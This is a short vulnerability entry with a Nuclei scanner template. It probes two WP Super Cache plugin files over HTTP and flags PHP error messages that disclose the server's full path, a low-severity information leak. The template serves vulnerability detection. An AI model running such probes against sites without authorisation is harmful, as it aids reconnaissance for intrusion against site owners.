漏洞描述
WordPress WP Super Cache plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
wp-super-cache-fpd: WordPress WP Super Cache - Full Path Disclosure
PoC代码[已公开]
id: wp-super-cache-fpd
info:
name: WordPress WP Super Cache - Full Path Disclosure
author: DhiyaneshDk
severity: low
description: |
WordPress WP Super Cache plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
reference:
- https://wordpress.org/plugins/super-cache/
metadata:
max-request: 1
verified: true
publicwww-query: "/plugins/wp-super-cache/"
tags: debug,wordpress,fpd,vuln,wp-super-cache,wp-plugin
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-super-cache/ossdl-cdn.php"
- "{{BaseURL}}/wp-content/plugins/wp-super-cache/rest/load.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 500'
- 'contains(body, "plugins/wp-super-cache")'
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:","failed to open stream")'
condition: and
# digest: 4b0a00483046022100b7d9d45d2b59d745cf87ddd884a9482c6957a9b3eddb9a607d904dae03b2f039022100b099de84357eb7c51ef4d2bab872ea88c17df60d6b1bb8f78234c9fccbe20686:922c64590222798bb761d5b6d8e72950